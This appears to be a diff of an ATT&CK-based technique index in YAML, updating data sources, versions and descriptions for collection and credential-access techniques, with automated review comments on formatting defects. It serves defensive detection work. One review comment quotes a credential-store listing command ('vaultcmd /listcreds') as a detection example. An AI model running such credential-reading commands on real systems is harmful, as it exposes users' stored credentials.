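Review bot: the T1555.004 block added by the -23308 hunk carries several defects that should be fixed upstream before the next regeneration. The Malwarebytes url is quoted with a trailing space ('.../the-windows-vaults/ '), which breaks the rendered link. The detection example 'vaultcmd /listcreds:“Windows Credentials”' uses typographic quotes, so anyone who turns it into a command-line match pattern will miss the ASCII quotes that actually get logged. The source_name 'Delpy Mimikatz Crendential Manager' and the description text 'CredEnumarateA function' are misspelled, and the source_name is referenced by three Citation tags that must change together with it. Finally, the path '%Systemdrive%\Users\\[Username]\AppData\Local\Microsoft\\[Vault/Credentials]\' keeps markdown backslash escapes inside a YAML literal block, where they render as doubled backslashes.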
@@ -23326,7 +5664,7 @@ collection: - source_name: Cylance Cleaver description: Cylance. (2014, December). Operation Cleaver. Retrieved September 14, 2017. - url: https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf + url: https://web.archive.org/web/20200302085133/https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 @@ -23348,7 +5686,7 @@ collection: phase_name: credential-access - kill_chain_name: mitre-attack phase_name: collection - modified: '2020-10-16T15:22:11.604Z' + modified: '2021-04-21T16:41:35.256Z' created: '2020-10-15T12:05:58.755Z' x_mitre_version: '1.0' x_mitre_is_subtechnique: true @@ -23360,8 +5698,8 @@ collection: map to a single MAC address, this could be an indicator that the ARP cache has been poisoned." x_mitre_data_sources: - - Packet capture - - Netflow/Enclave netflow + - 'Network Traffic: Network Traffic Content' + - 'Network Traffic: Network Traffic Flow' x_mitre_contributors: - Jon Sternstein, Stern Security x_mitre_platforms: @@ -23399,10 +5737,10 @@ collection: - macOS - Windows x_mitre_data_sources: - - Process monitoring - - Process command-line parameters - - File monitoring - - Binary file metadata + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'File: File Creation' + - 'Script: Script Execution' x_mitre_detection: |- Archival software and archived files can be detected in many ways. Common utilities that may be present on the system or brought in by an adversary may be detectable through process monitoring and monitoring for command-line arguments for known archival utilities. This may yield a significant number of benign events, depending on how systems in the environment are typically used. 
@@ -23473,6 +5811,9 @@ collection: operations. x_mitre_is_subtechnique: true x_mitre_version: '1.0' + x_mitre_data_sources: + - 'File: File Creation' + - 'Script: Script Execution' atomic_tests: [] T1560.002: technique: @@ -23516,8 +5857,8 @@ collection: Consider detecting writing of files with extensions and/or headers associated with compressed or encrypted file types. Detection efforts may focus on follow-on exfiltration activity, where compressed or encrypted files can be detected in transit with a network intrusion detection or data loss prevention system analyzing file headers.(Citation: Wikipedia File Header Signatures) x_mitre_data_sources: - - Process monitoring - - Process command-line parameters + - 'File: File Creation' + - 'Script: Script Execution' x_mitre_platforms: - Linux - macOS @@ -23700,10 +6041,9 @@ collection: - macOS - Windows x_mitre_data_sources: - - Process monitoring - - Process command-line parameters - - File monitoring - - Binary file metadata + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'File: File Creation' x_mitre_detection: |- Common utilities that may be present on the system or brought in by an adversary may be detectable through process monitoring and monitoring for command-line arguments for known archival utilities. This may yield a significant number of benign events, depending on how systems in the environment are typically used. @@ -24063,9 +6403,8 @@ collection: Behavior that could indicate technique use include an unknown or unusual process accessing APIs associated with devices or software that interact with the microphone, recording devices, or recording software, and a process periodically writing files to disk that contain audio data. x_mitre_data_sources: - - API monitoring - - Process monitoring - - File monitoring + - 'Process: OS API Execution' + - 'Command: Command Execution' x_mitre_version: '1.0' identifier: T1123 atomic_tests: 
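Review bot: T1123's detection text still points at a data source the technique no longer lists. The -24063 hunk removes 'File monitoring', but the x_mitre_detection sentence immediately above it names "a process periodically writing files to disk that contain audio data" as a behavioural indicator. Either keep a file component (the 'File: File Creation' this same diff uses in the -23473 hunk) or trim that sentence, so the guidance and the data source list agree.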
@@ -24081,12 +6420,15 @@ collection: name: powershell T1119: technique: - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - url: https://attack.mitre.org/techniques/T1119 - external_id: T1119 + created: '2017-05-31T21:31:27.985Z' + modified: '2020-03-31T22:18:43.019Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: collection + type: attack-pattern + id: attack-pattern--30208d3e-0d6b-43c8-883e-44462a514619 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Automated Collection description: "Once established within a system or network, an adversary may use automated techniques for collecting internal data. Methods for performing this technique could include use of a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) 
@@ -24096,21 +6438,20 @@ collection: of other techniques such as [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) and [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570) to identify and move files." - name: Automated Collection - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - id: attack-pattern--30208d3e-0d6b-43c8-883e-44462a514619 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: collection - modified: '2020-03-31T22:18:43.019Z' - created: '2017-05-31T21:31:27.985Z' - x_mitre_is_subtechnique: false - x_mitre_version: '1.0' - x_mitre_data_sources: - - File monitoring - - Data loss prevention - - Process command-line parameters + external_references: + - source_name: mitre-attack + url: https://attack.mitre.org/techniques/T1119 + external_id: T1119 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + x_mitre_system_requirements: + - Permissions to access directories and files that store information of interest. + x_mitre_platforms: + - Linux + - macOS + - Windows + x_mitre_permissions_required: + - User x_mitre_detection: Depending on the method used, actions could include common file system commands and parameters on the command-line interface within batch files or scripts. A sequence of actions like this may be unusual, depending 
@@ -24123,14 +6464,12 @@ collection: API to gather data. Data may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001). - x_mitre_permissions_required: - - User - x_mitre_platforms: - - Linux - - macOS - - Windows - x_mitre_system_requirements: - - Permissions to access directories and files that store information of interest. + x_mitre_data_sources: + - 'File: File Access' + - 'Command: Command Execution' + - 'Script: Script Execution' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: false identifier: T1119 atomic_tests: - name: Automated Collection Command Prompt @@ -24203,14 +6542,14 @@ collection: name: command_prompt T1115: technique: - id: attack-pattern--30973a08-aed9-4edf-8604-9084ce1b5c4f - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Clipboard Data - description: "Adversaries may collect data stored in the clipboard from users - copying information within or between applications. \n\nIn Windows, Applications - can access clipboard data by using the Windows API.(Citation: MSDN Clipboard) - OSX provides a native command, pbpaste, to grab clipboard contents.(Citation: - Operating with EmPyre)" + created: '2017-05-31T21:31:25.967Z' + modified: '2020-04-23T18:35:58.230Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: collection + type: attack-pattern + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: - source_name: mitre-attack external_id: T1115 
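Review bot: the three T1119 hunks (-24081, -24096, -24123) are almost entirely key reordering; the only content change is the data source list ('Data loss prevention' dropped, 'File: File Access' and 'Script: Script Execution' added). Have the generator emit keys in a stable order so reviewers can see the real edit. Also, T1119's modified timestamp ('2020-03-31T22:18:43.019Z') and x_mitre_version ('1.0') do not move despite the data source change, whereas the entries earlier in this diff bump both; confirm that this matches upstream and is not a merge artifact.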
@@ -24225,26 +6564,27 @@ collection: description: rvrsh3ll. (2016, May 18). Operating with EmPyre. Retrieved July 12, 2017. source_name: Operating with EmPyre - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: collection - modified: '2020-04-23T18:35:58.230Z' - created: '2017-05-31T21:31:25.967Z' - x_mitre_is_subtechnique: false - x_mitre_platforms: - - Linux - - Windows - - macOS + description: "Adversaries may collect data stored in the clipboard from users + copying information within or between applications. \n\nIn Windows, Applications + can access clipboard data by using the Windows API.(Citation: MSDN Clipboard) + OSX provides a native command, pbpaste, to grab clipboard contents.(Citation: + Operating with EmPyre)" + name: Clipboard Data + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + id: attack-pattern--30973a08-aed9-4edf-8604-9084ce1b5c4f + x_mitre_version: '1.1' + x_mitre_data_sources: + - 'Process: OS API Execution' + - 'Command: Command Execution' x_mitre_detection: Access to the clipboard is a legitimate function of many applications on an operating system. If an organization chooses to monitor for this behavior, then the data will likely need to be correlated against other suspicious or non-user-driven activity. - x_mitre_data_sources: - - API monitoring - x_mitre_version: '1.1' + x_mitre_platforms: + - Linux + - Windows + - macOS + x_mitre_is_subtechnique: false identifier: T1115 atomic_tests: - name: Utilize Clipboard to store or execute commands from 
@@ -24367,8 +6707,8 @@ collection: User access logging within Atlassian's Confluence can be configured to report access to certain pages and documents through AccessLogFilter. (Citation: Atlassian Confluence Logging) Additional log storage and analysis infrastructure will likely be required for more robust detection capabilities. x_mitre_data_sources: - - Third-party application logs - - Authentication logs + - 'Logon Session: Logon Session Creation' + - 'Application Log: Application Log Content' x_mitre_platforms: - SaaS atomic_tests: [] @@ -24389,7 +6729,7 @@ collection: description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques: A Technical Survey Of Common And Trending Process Injection Techniques. Retrieved December 7, 2017.' - source_name: Endgame Process Injection July 2017 + source_name: Elastic Process Injection July 2017 - url: https://www.adlice.com/userland-rootkits-part-1-iat-hooks/ description: 'Tigzy. (2014, October 15). Userland Rootkits: Part 1, IAT hooks. Retrieved December 12, 2017.' 
@@ -24439,9 +6779,9 @@ collection: description: | Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.(Citation: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017) Unlike [Keylogging](https://attack.mitre.org/techniques/T1056/001), this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via: - * **Hooks procedures**, which intercept and execute designated code in response to events such as messages, keystrokes, and mouse inputs.(Citation: Microsoft Hook Overview)(Citation: Endgame Process Injection July 2017) - * **Import address table (IAT) hooking**, which use modifications to a process’s IAT, where pointers to imported API functions are stored.(Citation: Endgame Process Injection July 2017)(Citation: Adlice Software IAT Hooks Oct 2014)(Citation: MWRInfoSecurity Dynamic Hooking 2015) - * **Inline hooking**, which overwrites the first bytes in an API function to redirect code flow.(Citation: Endgame Process Injection July 2017)(Citation: HighTech Bridge Inline Hooking Sept 2011)(Citation: MWRInfoSecurity Dynamic Hooking 2015) + * **Hooks procedures**, which intercept and execute designated code in response to events such as messages, keystrokes, and mouse inputs.(Citation: Microsoft Hook Overview)(Citation: Elastic Process Injection July 2017) + * **Import address table (IAT) hooking**, which use modifications to a process’s IAT, where pointers to imported API functions are stored.(Citation: Elastic Process Injection July 2017)(Citation: Adlice Software IAT Hooks Oct 2014)(Citation: MWRInfoSecurity Dynamic Hooking 2015) + * **Inline hooking**, which overwrites the first bytes in an API function to redirect code flow.(Citation: Elastic Process Injection July 
2017)(Citation: HighTech Bridge Inline Hooking Sept 2011)(Citation: MWRInfoSecurity Dynamic Hooking 2015) id: attack-pattern--f5946b5e-9408-485f-a7f7-b5efc88909b6 type: attack-pattern kill_chain_phases: @@ -24449,15 +6789,11 @@ collection: phase_name: collection - kill_chain_name: mitre-attack phase_name: credential-access - modified: '2020-03-24T21:29:13.565Z' + modified: '2020-11-10T18:29:31.138Z' created: '2020-02-11T19:01:15.930Z' x_mitre_data_sources: - - Windows event logs - - Process monitoring - - Loaded DLLs - - DLL monitoring - - Binary file metadata - - API monitoring + - 'Process: OS API Execution' + - 'Process: Process Metadata' x_mitre_permissions_required: - Administrator - SYSTEM 
@@ -24535,42 +6871,35 @@ collection: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: collection - modified: '2020-09-14T19:48:08.180Z' + modified: '2021-03-08T10:33:00.855Z' created: '2017-05-31T21:30:58.938Z' x_mitre_is_subtechnique: false x_mitre_contributors: - Praetorian - Shane Tully, @securitygypsy x_mitre_platforms: + - Windows + - IaaS - Linux - macOS - - Windows - - AWS - - GCP - - Azure x_mitre_detection: |- Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging. Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001). x_mitre_data_sources: - - File monitoring - - Process monitoring - - Process command-line parameters - x_mitre_version: '1.2' + - 'File: File Access' + - 'File: File Creation' + - 'Command: Command Execution' + x_mitre_version: '1.3' atomic_tests: [] T1530: technique: - id: attack-pattern--3298ce88-1628-43b1-87d9-0b5336b193d7 - description: |- - Adversaries may access data objects from improperly secured cloud storage. - - Many cloud service providers offer solutions for online data storage such as Amazon S3, Azure Storage, and Google Cloud Storage. 
These solutions differ from other storage solutions (such as SQL or Elasticsearch) in that there is no overarching application. Data from these solutions can be retrieved directly using the cloud provider's APIs. Solution providers typically offer security guides to help end users configure systems.(Citation: Amazon S3 Security, 2019)(Citation: Microsoft Azure Storage Security, 2019)(Citation: Google Cloud Storage Best Practices, 2019) - - Misconfiguration by end users is a common problem. There have been numerous incidents where cloud storage has been improperly secured (typically by unintentionally allowing public access by unauthenticated users or overly-broad access by all users), allowing open access to credit cards, personally identifiable information, medical records, and other sensitive information.(Citation: Trend Micro S3 Exposed PII, 2017)(Citation: Wired Magecart S3 Buckets, 2019)(Citation: HIPAA Journal S3 Breach, 2017) Adversaries may also obtain leaked credentials in source repositories, logs, or other means as a way to gain access to cloud storage objects that have access permission controls. - name: Data from Cloud Storage Object - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created: '2019-08-30T18:07:27.741Z' + modified: '2021-03-08T10:33:01.374Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: collection + type: attack-pattern external_references: - external_id: T1530 source_name: mitre-attack 
@@ -24599,33 +6928,34 @@ collection: url: https://www.hipaajournal.com/47gb-medical-records-unsecured-amazon-s3-bucket/ description: HIPAA Journal. (2017, October 11). 47GB of Medical Records and Test Results Found in Unsecured Amazon S3 Bucket. Retrieved October 4, 2019. - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: collection - modified: '2020-07-09T14:02:05.276Z' - created: '2019-08-30T18:07:27.741Z' - x_mitre_is_subtechnique: false - x_mitre_platforms: - - AWS - - GCP - - Azure - x_mitre_version: '1.0' - x_mitre_contributors: - - Netskope - - Praetorian + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Data from Cloud Storage Object + description: |- + Adversaries may access data objects from improperly secured cloud storage. + + Many cloud service providers offer solutions for online data storage such as Amazon S3, Azure Storage, and Google Cloud Storage. These solutions differ from other storage solutions (such as SQL or Elasticsearch) in that there is no overarching application. Data from these solutions can be retrieved directly using the cloud provider's APIs. Solution providers typically offer security guides to help end users configure systems.(Citation: Amazon S3 Security, 2019)(Citation: Microsoft Azure Storage Security, 2019)(Citation: Google Cloud Storage Best Practices, 2019) + + Misconfiguration by end users is a common problem. 
There have been numerous incidents where cloud storage has been improperly secured (typically by unintentionally allowing public access by unauthenticated users or overly-broad access by all users), allowing open access to credit cards, personally identifiable information, medical records, and other sensitive information.(Citation: Trend Micro S3 Exposed PII, 2017)(Citation: Wired Magecart S3 Buckets, 2019)(Citation: HIPAA Journal S3 Breach, 2017) Adversaries may also obtain leaked credentials in source repositories, logs, or other means as a way to gain access to cloud storage objects that have access permission controls. + id: attack-pattern--3298ce88-1628-43b1-87d9-0b5336b193d7 + x_mitre_permissions_required: + - User + x_mitre_data_sources: + - 'Cloud Storage: Cloud Storage Access' x_mitre_detection: Monitor for unusual queries to the cloud provider's storage service. Activity originating from unexpected sources may indicate improper permissions are set that is allowing access to data. Additionally, detecting failed attempts by a user for a certain object, followed by escalation of privileges by the same user, and access to the same object may be an indication of suspicious activity. - x_mitre_data_sources: - - Stackdriver logs - - Azure activity logs - - AWS CloudTrail logs - x_mitre_permissions_required: - - User + x_mitre_contributors: + - Netskope + - Praetorian + x_mitre_version: '1.1' + x_mitre_platforms: + - IaaS + x_mitre_is_subtechnique: false atomic_tests: [] T1602: technique: @@ -24663,9 +6993,8 @@ collection: modified: '2020-10-22T02:26:44.566Z' created: '2020-10-19T23:46:13.931Z' x_mitre_data_sources: - - Netflow/Enclave netflow - - Network protocol analysis - - Packet capture + - 'Network Traffic: Network Connection Creation' + - 'Network Traffic: Network Traffic Content' x_mitre_version: '1.0' x_mitre_is_subtechnique: false x_mitre_permissions_required: 
@@ -24714,19 +7043,16 @@ collection: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: collection - modified: '2020-10-12T12:16:55.085Z' + modified: '2021-04-14T14:16:12.151Z' created: '2018-04-18T17:59:24.739Z' x_mitre_is_subtechnique: false - x_mitre_version: '3.0' + x_mitre_version: '3.1' x_mitre_contributors: - Praetorian - Milos Stojadinovic x_mitre_data_sources: - - OAuth audit logs - - Application logs - - Authentication logs - - Data loss prevention - - Third-party application logs + - 'Logon Session: Logon Session Creation' + - 'Application Log: Application Log Content' x_mitre_detection: |- As information repositories generally have a considerably large user base, detection of malicious use can be non-trivial. At minimum, access to information repositories performed by privileged users (for example, Active Directory Domain, Enterprise, or Schema Administrators) should be closely monitored and alerted upon, as these types of accounts should not generally used to access information repositories. If the capability exists, it may be of value to monitor and alert on users that are retrieving and viewing a large number of documents and pages; this behavior may be indicative of programmatic means being used to retrieve all data within the repository. In environments with high-maturity, it may be possible to leverage User-Behavioral Analytics (UBA) platforms to detect and alert on user based anomalies. @@ -24739,6 +7065,7 @@ collection: - macOS - SaaS - Office 365 + - Google Workspace atomic_tests: [] T1005: technique: 
@@ -24763,9 +7090,8 @@ collection: id: attack-pattern--3c4a2599-71ee-4405-ba1e-0e28414b4bc5 x_mitre_version: '1.2' x_mitre_data_sources: - - File monitoring - - Process monitoring - - Process command-line parameters + - 'File: File Access' + - 'Command: Command Execution' x_mitre_detection: Monitor processes and command-line arguments for actions that could be taken to collect files from a system. Remote access tools with built-in features may interact directly with the Windows API to gather data. @@ -24820,16 +7146,25 @@ collection: as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001). x_mitre_data_sources: - - File monitoring - - Process monitoring - - Process command-line parameters + - 'File: File Access' + - 'Network Share: Network Share Access' + - 'Command: Command Execution' x_mitre_version: '1.2' atomic_tests: [] T1025: technique: - id: attack-pattern--1b7ba276-eedc-4951-a762-0ceea2c030ec - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Data from Removable Media + created: '2017-05-31T21:30:31.584Z' + modified: '2020-03-24T15:44:46.584Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: collection + type: attack-pattern + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + url: https://attack.mitre.org/techniques/T1025 + external_id: T1025 description: "Adversaries may search connected removable media on computers they have compromised to find files of interest. Sensitive data can be collected from any removable media (optical disk drive, USB memory, etc.) connected 
@@ -24837,36 +7172,26 @@ collection: may be in use, and common functionality within [cmd](https://attack.mitre.org/software/S0106) may be used to gather information. \n\nSome adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T1119) on removable media." - external_references: - - source_name: mitre-attack - url: https://attack.mitre.org/techniques/T1025 - external_id: T1025 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: collection - modified: '2020-03-24T15:44:46.584Z' - created: '2017-05-31T21:30:31.584Z' - x_mitre_is_subtechnique: false - x_mitre_platforms: - - Linux - - macOS - - Windows - x_mitre_system_requirements: - - Privileges to access removable media drive and files + name: Data from Removable Media + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + id: attack-pattern--1b7ba276-eedc-4951-a762-0ceea2c030ec + x_mitre_version: '1.1' + x_mitre_data_sources: + - 'File: File Access' + - 'Command: Command Execution' x_mitre_detection: Monitor processes and command-line arguments for actions that could be taken to collect files from a system's connected removable media. Remote access tools with built-in features may interact directly with the Windows API to gather data. Data may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001). - x_mitre_data_sources: - - File monitoring - - Process monitoring - - Process command-line parameters - x_mitre_version: '1.1' + x_mitre_system_requirements: + - Privileges to access removable media drive and files + x_mitre_platforms: + - Linux + - macOS + - Windows + x_mitre_is_subtechnique: false atomic_tests: [] T1114: technique: 
@@ -24891,7 +7216,7 @@ collection: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: collection - modified: '2020-03-24T18:31:06.417Z' + modified: '2021-04-14T14:22:44.435Z' created: '2017-05-31T21:31:25.454Z' x_mitre_contributors: - Swetha Prabakaran, Microsoft Threat Intelligence Center (MSTIC) @@ -24901,6 +7226,7 @@ collection: x_mitre_platforms: - Windows - Office 365 + - Google Workspace x_mitre_detection: |- There are likely a variety of ways an adversary could collect email from a target, each with a different mechanism for detection. 
@@ -24912,14 +7238,12 @@ collection: Auto-forwarded messages generally contain specific detectable artifacts that may be present in the header; such artifacts would be platform-specific. Examples include X-MS-Exchange-Organization-AutoForwarded set to true, X-MailFwdBy and X-Forwarded-To. The forwardingSMTPAddress parameter used in a forwarding process that is managed by administrators and not by user actions. All messages for the mailbox are forwarded to the specified SMTP address. However, unlike typical client-side rules, the message does not appear as forwarded in the mailbox; it appears as if it were sent directly to the specified destination mailbox.(Citation: Microsoft Tim McMichael Exchange Mail Forwarding 2) High volumes of emails that bear the X-MS-Exchange-Organization-AutoForwarded header (indicating auto-forwarding) without a corresponding number of emails that match the appearance of a forwarded message may indicate that further investigation is needed at the administrator level rather than user-level. x_mitre_data_sources: - - Office 365 trace logs - - Mail server - - Email gateway - - Authentication logs - - File monitoring - - Process monitoring - - Process use of network - x_mitre_version: '2.1' + - 'File: File Access' + - 'Network Traffic: Network Connection Creation' + - 'Logon Session: Logon Session Creation' + - 'Command: Command Execution' + - 'Application Log: Application Log Content' + x_mitre_version: '2.2' atomic_tests: [] T1114.003: technique: 
@@ -24945,24 +7269,25 @@ collection: or the victim’s organization to use as part of further exploits or operations.(Citation: US-CERT TA18-068A 2018) Outlook and Outlook Web App (OWA) allow users to create inbox rules for various email functions, including forwarding to a different - recipient. Messages can be forwarded to internal or external recipients, and - there are no restrictions limiting the extent of this rule. Administrators - may also create forwarding rules for user accounts with the same considerations - and outcomes.(Citation: Microsoft Tim McMichael Exchange Mail Forwarding 2) - \n\nAny user or administrator within the organization (or adversary with valid - credentials) can create rules to automatically forward all received messages - to another recipient, forward emails to different locations based on the sender, - and more." + recipient. Similarly, Google Workspace users or administrators can set up + mail forwarding rules via the Google Workspace web interface. Messages can + be forwarded to internal or external recipients, and there are no restrictions + limiting the extent of this rule. Administrators may also create forwarding + rules for user accounts with the same considerations and outcomes.(Citation: + Microsoft Tim McMichael Exchange Mail Forwarding 2) \n\nAny user or administrator + within the organization (or adversary with valid credentials) can create rules + to automatically forward all received messages to another recipient, forward + emails to different locations based on the sender, and more." 
id: attack-pattern--7d77a07d-02fe-4e88-8bd9-e9c008c01bf0 type: attack-pattern kill_chain_phases: - kill_chain_name: mitre-attack phase_name: collection - modified: '2020-10-19T22:43:45.509Z' + modified: '2021-03-25T13:08:30.699Z' created: '2020-02-19T18:54:47.103Z' x_mitre_contributors: - Swetha Prabakaran, Microsoft Threat Intelligence Center (MSTIC) - x_mitre_version: '1.0' + x_mitre_version: '1.1' x_mitre_is_subtechnique: true x_mitre_permissions_required: - User @@ -24971,14 +7296,11 @@ collection: Auto-forwarded messages generally contain specific detectable artifacts that may be present in the header; such artifacts would be platform-specific. Examples include `X-MS-Exchange-Organization-AutoForwarded` set to true, `X-MailFwdBy` and `X-Forwarded-To`. The `forwardingSMTPAddress` parameter used in a forwarding process that is managed by administrators and not by user actions. All messages for the mailbox are forwarded to the specified SMTP address. However, unlike typical client-side rules, the message does not appear as forwarded in the mailbox; it appears as if it were sent directly to the specified destination mailbox.(Citation: Microsoft Tim McMichael Exchange Mail Forwarding 2) High volumes of emails that bear the `X-MS-Exchange-Organization-AutoForwarded` header (indicating auto-forwarding) without a corresponding number of emails that match the appearance of a forwarded message may indicate that further investigation is needed at the administrator level rather than user-level. x_mitre_data_sources: - - Process use of network - - Process monitoring - - Email gateway - - Mail server - - Office 365 trace logs + - 'Application Log: Application Log Content' x_mitre_platforms: - Office 365 - Windows + - Google Workspace atomic_tests: [] T1056.002: technique: 
@@ -25035,10 +7357,7 @@ collection: x_mitre_contributors: - Matthew Molyett, @s1air, Cisco Talos x_mitre_data_sources: - - PowerShell logs - - User interface - - Process command-line parameters - - Process monitoring + - 'Process: Process Creation' x_mitre_permissions_required: - User x_mitre_detection: |- @@ -25121,17 +7440,12 @@ collection: x_mitre_contributors: - John Lambert, Microsoft Threat Intelligence Center x_mitre_data_sources: - - Windows Registry - - Windows event logs - - User interface - - Process command-line parameters - - Process monitoring - - PowerShell logs - - Loaded DLLs - - Kernel drivers - - DLL monitoring - - Binary file metadata - - API monitoring + - 'Windows Registry: Windows Registry Key Modification' + - 'Driver: Driver Load' + - 'Process: OS API Execution' + - 'Process: Process Creation' + - 'File: File Modification' + - 'Process: Process Metadata' x_mitre_detection: 'Detection may vary depending on how input is captured but may include monitoring for certain Windows API calls (e.g. `SetWindowsHook`, `GetKeyState`, and `GetAsyncKeyState`)(Citation: Adventures of a Keystroke), 
@@ -25152,26 +7466,14 @@ collection: atomic_tests: [] T1056.001: technique: - id: attack-pattern--09a60ea3-a8d1-4ae5-976e-5783248b72a4 - description: "Adversaries may log user keystrokes to intercept credentials as - the user types them. Keylogging is likely to be used to acquire credentials - for new access opportunities when [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) - efforts are not effective, and may require an adversary to intercept keystrokes - on a system for a substantial period of time before credentials can be successfully - captured.\n\nKeylogging is the most prevalent type of input capture, with - many different ways of intercepting keystrokes.(Citation: Adventures of a - Keystroke) Some methods include:\n\n* Hooking API callbacks used for processing - keystrokes. Unlike [Credential API Hooking](https://attack.mitre.org/techniques/T1056/004), - this focuses solely on API functions intended for processing keystroke data.\n* - Reading raw keystroke data from the hardware buffer.\n* Windows Registry modifications.\n* - Custom drivers.\n* [Modify System Image](https://attack.mitre.org/techniques/T1601) - may provide adversaries with hooks into the operating system of network devices - to read raw keystrokes for login sessions.(Citation: Cisco Blog Legacy Device - Attacks) " - name: Keylogging - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created: '2020-02-11T18:58:11.791Z' + modified: '2020-10-21T01:30:56.227Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: collection + - kill_chain_name: mitre-attack + phase_name: credential-access + type: attack-pattern external_references: - source_name: mitre-attack external_id: T1056.001 
@@ -25187,21 +7489,35 @@ collection: url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954 description: Omar Santos. (2020, October 19). Attackers Continue to Target Legacy Devices. Retrieved October 20, 2020. - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: collection - - kill_chain_name: mitre-attack - phase_name: credential-access - modified: '2020-10-21T01:30:56.227Z' - created: '2020-02-11T18:58:11.791Z' - x_mitre_platforms: - - Windows - - macOS - - Linux - - Network - x_mitre_is_subtechnique: true - x_mitre_version: '1.1' + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Keylogging + description: "Adversaries may log user keystrokes to intercept credentials as + the user types them. Keylogging is likely to be used to acquire credentials + for new access opportunities when [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) + efforts are not effective, and may require an adversary to intercept keystrokes + on a system for a substantial period of time before credentials can be successfully + captured.\n\nKeylogging is the most prevalent type of input capture, with + many different ways of intercepting keystrokes.(Citation: Adventures of a + Keystroke) Some methods include:\n\n* Hooking API callbacks used for processing + keystrokes. 
